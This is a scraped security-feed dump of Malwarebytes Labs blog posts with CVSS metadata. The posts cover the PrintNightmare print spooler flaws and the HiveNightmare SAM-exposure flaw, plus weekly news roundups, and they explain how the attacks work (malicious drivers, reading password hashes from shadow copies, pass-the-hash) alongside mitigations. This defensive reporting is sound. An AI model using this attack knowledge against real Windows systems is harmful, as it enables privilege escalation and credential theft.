Emergency fix for PrintNightmare released by Microsoft", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-07T14:17:31", "id": "MALWAREBYTES:DB34937B6474073D9444648D34438225", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-08T08:32:20", "description": "In a rush to be the first to publish a proof-of-concept (PoC), researchers have published a write-up and a demo exploit to demonstrate a vulnerability that has been dubbed PrintNightmare. Only to find out they had alerted the world to a new 0-day vulnerability by accident.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. 
RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nAs per [usual](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/06/microsoft-fixes-seven-zero-days-including-two-puzzlemaker-targets-google-fixes-serious-android-flaw/>), the general advice was to install the patches from Microsoft and you\u2019re done. Fast forward another week and a researcher announced he'd found a way to exploit the vulnerability to achieve both local privilege escalation and remote code execution. This actually happens a lot when researchers reverse engineer a patch.\n\nOnly in this case it had an unexpected consequence. A different team of researchers had also found an RCE vulnerability in the Print Spooler service. They called theirs PrintNightmare and believed it was the same as CVE-2021-1675. They were working on a presentation to be held at the Black Hat security conference. But now they feared that the other team had stumbled over the same vulnerability, so they published their work, believing it was covered by the patch already released by Microsoft.\n\nBut the patch for CVE-2021-1675 didn't seem to work against the PrintNightmare vulnerability. It appeared that PrintNightmare and CVE-2021-1675 were in fact two very similar but different vulnerabilities in the Print Spooler.\n\nAnd with that, it looked as if the PrintNightmare team had, unwittingly, disclosed a new 0-day vulnerability irresponsibly. (Disclosure of vulnerabilities is considered responsible if a vendor is given enough time to issue a patch.)\n\nSince then, some security researchers have argued that CVE-2021-1675 and PrintNightmare are the same, and others have reported that the CVE-2021-1675 patch works on _some_ systems.\n\n> [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) / CVE-2021-1675 - It appears patches might be effective on systems that are not domain controllers. 
RpcAddPrinterDriverEx call as non-admin fails with access denied against fully patched Server 2016 and 2019 non-DC, but after dcpromo the exploit works again. \n [pic.twitter.com/USetUXUzXN](<https://t.co/USetUXUzXN>)\n> \n> -- Stan Hegt (@StanHacked) [July 1, 2021](<https://twitter.com/StanHacked/status/1410405688766042115?ref_src=twsrc%5Etfw>)\n\nWhether they are the same or not, what is not in doubt is that there are live Windows systems where PrintNightmare cannot be patched. And unfortunately, it seems that the systems where the patch doesn't work are Windows Domain Controllers, which is very much the worst case scenario. \n\n### PrintNightmare\n\nThe Print Spooler service is embedded in the Windows operating system and manages the printing process. It is running by default on most Windows machines, including Active Directory servers.\n\nIt handles preliminary functions of finding and loading the print driver, creating print jobs, and then ultimately printing. This service has been around \u201cforever\u201d and it has been a fruitful hunting ground for vulnerabilities, with many flaws being found and fixed over the years. Remember [Stuxnet](<https://blog.malwarebytes.com/threat-analysis/2013/11/stuxnet-new-light-through-old-windows/>)? Stuxnet also exploited a vulnerability in the Print Spooler service as part of the set of vulnerabilities the worm used to spread.\n\nPrintNightmare can be triggered by an unprivileged user attempting to load a malicious driver remotely. Using the vulnerability, researchers have been able to gain SYSTEM privileges, and achieved remote code execution with the highest privileges on a fully patched system.\n\nTo exploit the flaw, attackers would first have to gain access to a network with a vulnerable machine. 
Although this provides some measure of protection, it is worth noting that there are underground markets where criminals can purchase this kind of access for a few dollars.\n\nIf they can secure any kind of access, they can potentially use PrintNightmare to turn a normal user into an all-powerful Domain Admin. As a Domain Admin they could then act almost with impunity, spreading ransomware, deleting backups and even disabling security software.\n\n### Mitigation\n\nConsidering the large number of machines that may be vulnerable to PrintNightmare, and that several methods to exploit the vulnerability have been published, it seems likely there will soon be malicious use-cases for this vulnerability.\n\nThere are a few things you can do until the vulnerability is patched. Microsoft will probably try to patch the vulnerability before next patch Tuesday (July 12), but until then you can:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the internet.\n\nI realize the above will not be easy or even feasible in every case. For those machines that need the Print Spooler service and also need to be accessible from outside the LAN, very carefully limit and [monitor](<https://support.malwarebytes.com/hc/en-us/articles/360056829274-Configure-Brute-Force-Protection-in-Malwarebytes-Nebula>) access events and permissions. 
Also at all costs avoid running the Print Spooler service on any domain controllers.\n\nFor further measures it is good to know that the exploit works by dropping a DLL in a subdirectory under C:\\Windows\\System32\\spool\\drivers, so system administrators can create a \u201cDeny to modify\u201d rule for that directory and its subdirectories so that even the SYSTEM account can not place a new DLL in them.\n\nThis remains a developing situation and we will update this article if more information becomes available.\n\n### Update July 2, 2021\n\nMicrosoft acknowledged this vulnerability and it has been assigned [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). In their description Microsoft also provides an extra workaround besides disabling the Print Spooler service.\n\n**Disable inbound remote printing through Group Policy**\n\nYou can also configure the settings via Group Policy as follows:\n\n * Computer Configuration / Administrative Templates / Printers\n * Disable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks.\n\n**Impact of workaround** This policy will block the remote attack vector by preventing inbound remote printing operations. 
The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nThe post [PrintNightmare 0-day can be used to take over Windows domain controllers](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T14:08:26", "type": "malwarebytes", "title": "PrintNightmare 0-day can be used to take over Windows domain controllers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-01T14:08:26", "id": "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T12:35:46", "description": "I doubt if there has ever been a more appropriate 
nickname for a vulnerable service than PrintNightmare. There must be a whole host of people in Redmond having nightmares about the Windows Print Spooler service by now.\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a vulnerable machine a malicious printer driver. The problem was made worse by [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) around whether PrintNightmare was a known, patched problem or an entirely new problem. In the end it turned out to be a bit of both.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nIn a rush to be the first to publish a proof-of-concept (PoC), researchers published a write-up and a demo exploit to demonstrate the vulnerability. Only to find out they had alerted the world to a new 0-day vulnerability by accident. 
This vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) was introduced under the name PrintNightmare.\n\nOminously, the researchers behind PrintNightmare predicted that the Print Spooler, which has seen its fair share of problems in the past, would be a fertile ground for further discoveries.\n\nAt the beginning of July, Microsoft issued a set of out-of-band patches to fix this Windows Print Spooler RCE vulnerability. Soon enough, several researchers figured out that local privilege escalation (LPE) still worked. This means that threat actors and already active malware can still exploit the vulnerability to gain SYSTEM privileges. In a demo, [Benjamin Delpy](<https://twitter.com/gentilkiwi>) showed that the update failed to fix vulnerable systems that use certain settings for a feature called Point and Print, which makes it easier for network users to obtain the printer drivers they need.\n\nOn July 13 the Cybersecurity and Infrastructure Security Agency (CISA) issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it became aware of multiple threat actors exploiting PrintNightmare.\n\nAlso in July, [CrowdStrike](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) identified Magniber ransomware attempting to use a known PrintNightmare vulnerability to compromise victims.\n\n### An end to the nightmare?\n\nIn the August 10 [Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>) update, the Print Spooler service was subject to _yet more_ patching, and Microsoft said that this time its patch should address all publicly documented security problems with the service.\n\nIn an unusual breaking change, one part of the update made admin rights required before using the Windows 
Point and Print feature.\n\n### Just one day later\n\nOn August 11, Microsoft released information about [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>), yet another 0-day that allows local attackers to gain SYSTEM privileges on a computer. Again, it was security researcher Benjamin Delpy who [demonstrated](<https://vimeo.com/581584478>) the vulnerability, showing that threat actors can still gain SYSTEM privileges simply by connecting to a remote print server.\n\n### Mitigation\n\nThe workaround offered by Microsoft is stopping and disabling the Print Spooler service, although at this point you may be seriously considering a revival of the paperless office idea. So:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the Internet.\n\nMicrosoft says it is investigating the vulnerability and working on (yet another) security update.\n\nLike I said [yesterday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>): To be continued.\n\nThe post [Microsoft's PrintNightmare continues, shrugs off Patch Tuesday fixes](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, 
"published": "2021-08-12T11:30:26", "type": "malwarebytes", "title": "Microsoft\u2019s PrintNightmare continues, shrugs off Patch Tuesday fixes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T11:30:26", "id": "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-15T10:37:13", "description": "### Last week on Malwarebytes Labs\n\n * Multiple video games break after [domain name snafu](<https://blog.malwarebytes.com/privacy-2/2021/11/multiple-video-games-break-after-domain-name-snafu/>)\n * How to remove [adware on an Android phone](<https://blog.malwarebytes.com/101/how-tos/2021/11/how-to-remove-adware-on-an-android-phone/>)\n * [Smart TV adverts](<https://blog.malwarebytes.com/privacy-2/2021/11/smart-tv-adverts-put-a-wrinkle-in-your-programming/>) put a wrinkle in your programming\n * Are cybercriminals turning away from the US and [targeting Europe](<https://blog.malwarebytes.com/malwarebytes-news/2021/11/are-cybercriminals-turning-away-from-the-us-and-targeting-europe-instead/>) instead?\n * Patch now! 
[Microsoft plugs actively exploited zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/patch-now-microsoft-plugs-actively-exploited-zero-days-and-other-updates/>) and other updates\n * [Playstation 5 hacked](<https://blog.malwarebytes.com/hacking-2/2021/11/playstation-5-hacked-twice/>)\u2014twice!\n * Murder-for-hire, money laundering, and more: How [organised criminals work online](<https://blog.malwarebytes.com/reports/2021/11/murder-for-hire-money-laundering-and-more-how-organised-criminals-work-online/>)\n * Could Apple\u2019s new MacBooks signal a [change in direction on security](<https://blog.malwarebytes.com/mac/2021/11/do-apples-new-macbooks-signal-a-change-in-direction-on-security/>)?\n * The [importance of backing up](<https://blog.malwarebytes.com/101/2021/11/the-importance-of-backing-up/>)\n * A [multi-stage PowerShell](<https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/>) based attack targets Kazakhstan\n\nOn Malwarebytes' Lock and Code podcast episode S02E21 of this week we talked to Jess Dodson about "[Why we fail at getting the cybersecurity basics right.](<https://blog.malwarebytes.com/podcast/2021/11/why-we-fail-at-getting-the-cybersecurity-basics-right-with-jess-dodson-lock-and-code-s02e21/>)"\n\n### Other cybersecurity news\n\n * Romanian authorities arrested two individuals suspected of cyberattacks deploying the [Sodinokibi/REvil ransomware](<https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged>). (Source: Europol Newsroom)\n * The TOR project launched a new release:[ Tor Browser 11.0](<https://blog.torproject.org/new-release-tor-browser-11-0>) (Source: The TOR blog)\n * Threat actors are actively exploiting [ZOHO ManageEngine ADSelfService Plus vulnerability](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) in a targeted campaign. 
(Source: Microsoft Security blog) \n * [SolarWinds Serv-U vulnerability](<https://blog.fox-it.com/2021/11/08/ta505-exploits-solarwinds-serv-u-vulnerability-cve-2021-35211-for-initial-access/>) is used for initial access in Clop ransomware attacks. (Source: Fox IT)\n * Facebook whistleblower Frances Haugen warned that the [metaverse will gather even more personal information](<https://apnews.com/article/technology-lifestyle-business-only-on-ap-media-e4f03d38243552e46a77d0d3f0d45e3b>). (Source: AP news)\n * The US Treasury Department announced a set of actions focused on [disrupting criminal ransomware actors and virtual currency exchanges](<https://home.treasury.gov/news/press-releases/jy0471>) that launder the proceeds of ransomware. (Source: US Department of the Treasury)\n * A suspected state-sponsored threat actor has used Hong Kong pro-democracy news sites to deploy a [macOS zero-day exploit chain](<https://therecord.media/macos-zero-day-deployed-via-hong-kong-pro-democracy-news-sites/>). (Source: The Record)\n * [Void Balaur hackers-for-hire](<https://www.bleepingcomputer.com/news/security/void-balaur-hackers-for-hire-sell-stolen-mailboxes-and-private-data/>) sell stolen mailboxes and private data. (Source: Bleeping Computer)\n * [Queensland water supplier Sunwater](<https://www.abc.net.au/news/2021-11-11/qld-hackers-target-water-supplier-sunwater-cyber-security-attack/100610400>) targeted by hackers in months-long undetected cybersecurity breach. (Source: ABC.net.au news)\n * Missouri apologizes to 600,000 teachers who had [SSNs and private info exposed](<https://www.zdnet.com/article/missouri-apologizes-to-600k-teachers-who-had-ssns-and-private-info-exposed-offers-credit-monitoring/>). 
(Source: ZDNet)\n\nStay safe, everyone!\n\nThe post [A week in security (Nov 8 - Nov 14)](<https://blog.malwarebytes.com/a-week-in-security/2021/11/a-week-in-security-nov-8-nov-14-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-15T10:14:02", "type": "malwarebytes", "title": "A week in security (Nov 8 \u2013 Nov 14)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-11-15T10:14:02", "id": "MALWAREBYTES:C61940E0E1CB3ACBDD840B3497805A7E", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/11/a-week-in-security-nov-8-nov-14-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-28T20:35:10", "description": "### Last week on Malwarebytes Labs\n\n * Freedom Hosting operator [gets 27 years](<https://blog.malwarebytes.com/cybercrime/2021/09/freedom-hosting-operator-gets-27-years-for-hosting-dark-web-child-abuse-sites/>) for hosting dark web abuse sites\n * Microsoft makes a [bold 
move](<https://blog.malwarebytes.com/opinion/2021/09/microsoft-makes-a-bold-move-towards-a-password-less-future/>) towards a password-less future\n * New Mac malware masquerades as [iTerm2, remote desktop and other apps](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/new-mac-malware-masquerades-as-iterm2-remote-desktop-and-other-apps/>)\n * Internet safety tips for kids and teens: a [comprehensive guide](<https://blog.malwarebytes.com/how-tos-2/2021/09/internet-safety-tips-for-kids-and-teens-a-comprehensive-guide-for-the-modern-parent/>) for the modern parent\n * Google, geofence warrants, [and you](<https://blog.malwarebytes.com/privacy-2/2021/09/google-geofence-warrants-and-you/>)\n * No, Colonel Gaddafi\u2019s daughter isn\u2019t [emailing to give you untold riches](<https://blog.malwarebytes.com/social-engineering/2021/09/no-colonel-gaddafis-daughter-isnt-emailing-to-give-you-untold-riches/>)\n * Patch vCenter Server \u201c[right now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>)\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure\n * [Patch now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/>)! 
Insecure Hikvision security cameras can be taken over remotely\n * MSHTML [attack targets Russian state rocket centre](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) and interior ministry\n * Italian mafia cybercrime sting leads to [100+ arrests](<https://blog.malwarebytes.com/scams/2021/09/italian-mafia-cybercrime-sting-leads-to-100-arrests/>)\n * How to [clear your cache](<https://blog.malwarebytes.com/101/how-tos/2021/09/how-to-clear-your-cache/>)\n * Microsoft exchange autodiscover flaw [reveals users\u2019 passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/microsoft-exchange-autodiscover-flaw-reveals-users-passwords/>)\n * Parents and teachers believe digital surveillance of kids [outweighs risks](<https://blog.malwarebytes.com/privacy-2/2021/09/parents-and-teachers-believe-digital-surveillance-of-kids-outweighs-risks/>)\n * SonicWall warns users to [patch critical vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/sonicwall-warns-users-to-patch-critical-vulnerability-as-soon-as-possible/>) \u201cas soon as possible\u201d\n * Beware! 
Uber scam [lures victims](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/beware-uber-scam-lures-victims-with-alert-from-a-real-uber-number/>) with alert from a real Uber number\n * Teaching [cybersecurity skills to special needs children](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/teaching-cybersecurity-skills-to-special-needs-children-with-alana-robinson-lock-and-code-s02e18/>) with Alana Robinson: Lock and Code S02E18\n\n### Other cybersecurity news\n\n * UK ministry of defence [apologises](<https://www.theregister.com/2021/09/23/afghan_email_fail_ministry_defence/>) - again - after another major email blunder in Afghanistan (Source: The Register)\n * Database containing personal info of 106 million international visitors to Thailand [exposed](<https://www.comparitech.com/blog/information-security/thai-traveler-data-leak/>) online (Source: Comparitech)\n * Fake WhatsApp backup message [delivers malware](<https://portswigger.net/daily-swig/fake-whatsapp-backup-message-delivers-malware-to-spanish-speakers-devices>) to Spanish speakers\u2019 devices (Source: The Daily Swig) \nMobile phones of 5 French cabinet ministers [infected by Pegasus malware](<https://www.france24.com/en/europe/20210924-mobile-phones-of-five-french-cabinet-ministers-infected-by-pegasus-malware>) (Source: France 24)\n * Ransomware dropping malware swaps phishing for [sneaky new attack route](<https://www.zdnet.com/article/this-ransomware-dropping-malware-has-swapped-phishing-for-a-sneaky-new-attack-route/>) (Source: ZDNet)\n * Phishing attacks more sophisticated, malicious emails [time to coincide](<https://www.cpomagazine.com/cyber-security/phishing-attacks-more-sophisticated-malicious-emails-timed-to-coincide-with-periods-of-low-energy-and-inattentiveness/>) with periods of low energy and inattentiveness (Source: CPO magazine)\n * Keeping your data [secure at work](<https://minutehack.com/news/keeping-your-data-secure-at-work>) (Source: Minute Hack)\n\nStay safe, 
everyone!\n\nThe post [A week in security (Sept 20 \u2013 Sept 26)](<https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-27T11:01:42", "type": "malwarebytes", "title": "A week in security (Sept 20 \u2013 Sept 26)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T11:01:42", "id": "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-31T08:36:55", "description": "Users with low privileges can access sensitive Registry database files on Windows 10 and Windows 11, leaving them vulnerable to a local elevation of privilege vulnerability known as SeriousSAM or HiveNightmare.\n\nDoesn't sound serious? Reassured that users must already have access to the system and be able to execute code on said system to use this vulnerability? Don't be.\n\nUsing SeriousSAM, a user can access multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. The attacker would then have full control, which means they can install programs, view, change, or delete data, and create new accounts with full user rights. Which is exactly what an attacker wants.\n\n### My mama said\n\nSAM stands for Security Accounts Manager and it is supposed to be a protected database that can only be accessed by users with Administrator privileges. This was designed as such because the database contains the hashed passwords for all users on a system.\n\nNow, I\u2019ve always been taught that anyone with physical access to your system, and enough knowledge, can take it over. 
One of the reasons why this is true is that the \u201cholder\u201d of the system can dump those sensitive Registry database files _when Windows is not running_. \n\nWhen Windows is not running the registry is not \u201cmounted\u201d and the "access violation" protection is inactive, since to another operating system (OS) they are just files like any other. You can see the caveat there. You need to look at the files from an external OS to pull this off. (I will leave the \u201chow to\u201d do that to your imagination.)\n\nWhile dumping a registry hive from an inactive Windows machine like that may sound daunting to some, and difficult for malware to pull off, SeriousSAM makes it much easier. SeriousSAM removes the need for that external OS, and for Windows to be off, making it a much more achievable trick. It allows users (or malicious programs inadvertently run by those users) to bypass the "access violation" protection on the computer they're using, while it's running.\n\n### Pass the hash\n\n"But the passwords are hashed!", I heard you thinking. In that case, meet pass-the-hash attacks. Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then return the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client\u2019s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that \u201cmathematical operation\u201d required to gain access. The authentication process does not require the plaintext password. The hash is enough. 
\n\nSo, _pass the hash_ is the name for a technique that allows an attacker to authenticate to a remote server or service by using the hash of a user's password, instead of requiring the associated plaintext password as is normally the case.\n\n### Made easy\n\nThe vulnerability we have been referring to as SeriousSAM is listed as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) and while it is unclear exactly which versions of Windows are vulnerable, it looks as if some versions of Windows 10 and all versions of Windows 11 are affected, as long as System Protection, aka Shadow Volumes, is enabled. The Microsoft advisory says "\u2026we can confirm that this issue affects Windows 10 version 1809 and newer operating systems". The company is researching the issue and we will update this post once we know more.\n\nThe vulnerability got its other name, HiveNightmare, because it affects registry hives, and as a reference to the recently discovered [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) vulnerabilities in the Windows Print Spooler service. I think it's a better name for this vulnerability because SAM is not the only sensitive Registry database that's affected. Others are all stored in the `%windir%\\system32 \\config` folder, as is SAM. They are SYSTEM, SECURITY, DEFAULT, and SOFTWARE. Which means there might be more options for hackers with limited access to raise privileges or achieve remote code execution waiting to be found.\n\nThe underlying problem is, in Microsoft's own words "overly permissive Access Control Lists (ACLs) on multiple system files". Those lax permissions are carried over into the Shadow copies where the files are unmounted and as unprotected as the files on the dormant computer my mother warned me about. 
So, any user can dump the database from the Shadow copy and as such create a readable database.\n\nShadow Volumes are enabled by default so that doesn\u2019t bring the number of systems at risk down a lot. It is a useful option, but in this case it is also what enables this vulnerability. \n\n### Mitigation\n\nWhile Microsoft is expected to come up with an out-of-band patch for this vulnerability, there are some things you can do to defeat the vulnerability. Whatever you do to address the problem, note that fixing the cause does not necessarily fix broken permissions in shadow copies you have already taken.\n\nYou can find some useful commands for discovering if your systems have Shadow copies enabled, and whether they are vulnerable in the [CERT advisory](<https://www.kb.cert.org/vuls/id/506989>). The advisory notes that "simply having a system drive that is larger than 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be automatically created."\n\nMicrosoft recommends restricting access to the problematic folder and deleting Volume Shadow Copy Service (VSS) shadow copies to mitigate this issue.\n\n**Restrict access to the contents of `%windir%\\system32\\config`**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command: icacls %windir%\\system32\\config\\\\*.* /inheritance:e\n\n**Delete Volume Shadow Copy Service (VSS) shadow copies**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point (if desired).\n\n**Note: Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications.**\n\nThe post [HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/>) 
